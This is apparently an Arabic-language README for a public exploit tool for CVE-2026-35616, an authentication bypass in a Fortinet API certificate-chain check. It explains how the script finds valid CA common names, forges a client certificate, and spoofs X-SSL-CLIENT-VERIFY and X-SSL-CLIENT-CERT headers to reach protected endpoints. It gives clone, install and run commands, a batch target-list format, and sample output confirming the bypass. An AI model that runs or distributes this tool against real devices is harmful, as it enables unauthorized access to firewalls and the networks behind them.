
نص استغلال ثغرة CVE-2026-35616 الذي يتجاوز التحقق من سلسلة الشهادات في واجهة برمجة تطبيقات Fortinet عبر اكتشاف أسماء CN صالحة، وتوليد شهادة عميل مزورة، واستكشاف نقاط النهاية المحمية باستخدام ترويسات مخصصة.
استغلال ثغرة تجاوز التحقق من سلسلة الشهادات في واجهة برمجة تطبيقات Fortinet.
يقوم السكربت تلقائيًا باكتشاف الأسماء الشائعة (Common Name) الصالحة من مصادر متعددة،
ويولّد شهادة عميل مزيفة وينفذ طلبات إلى نقاط النهاية المحمية
باستخدام الترويسات X-SSL-CLIENT-VERIFY و X-SSL-CLIENT-CERT.
!!!مهم: استخدم فقط على الأنظمة التي لديك إذن صريح لاختبارها.
requestscryptographyurllib3openssl (لاكتشاف CA المتقدم عبر مصافحة TLS)# استنساخ المشروع
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616
# تثبيت التبعيات
pip install -r requirements.txt
## الاستخدام
# التشغيل الأساسي
python3 exploit.py
# مع تحديد الهدف والمنفذ
python3 exploit.py <TARGET_IP> [PORT]
# أمثلة:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443
# تنسيق ملف الأهداف (targets.txt)
عند الاختبار الجماعي، أنشئ ملف targets.txt مع عنوان هدف واحد في كل سطر:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal
# ملفات الإخراج
عند التنفيذ الناجح، يقوم السكربت بإنشاء:
results/bypass_results_<TARGET>_<PORT>_<TIMESTAMP>.json — تقرير مفصل بصيغة JSON يتضمن:
الاسم الشائع (CN) المستخدم
حالات الاستجابة لكل نقطة نهاية
بادئات الاستجابات للتحليل
# هيكل الإخراج
[ wa6n3r ] ◆ GH: github.com/wa6n3r ◆ WEB: wa6n3r.com
[*] CVE-2026-35616 Target: https://192.168.1.100:443
[*] Discovering CA CNs from multiple sources...
[•] TLS CA CN: 'fortinet-ca2'
[•] ZTNA CA CN: 'support'
[*] Found 2 candidate CN(s): fortinet-ca2, support
[*] Testing 2 candidate CN(s) for bypass...
[+] CN='support' | HTTP 200 | retval=1 | BYPASS CONFIRMED
[*] Probing all cert_chain endpoints with CN='support'...
GET /api/v1/system/capabilities
HTTP 200: '{"result": {"retval": 1, ...}}'
[+] Results saved to: results/bypass_results_192.168.1.100_443_20260101_120000.json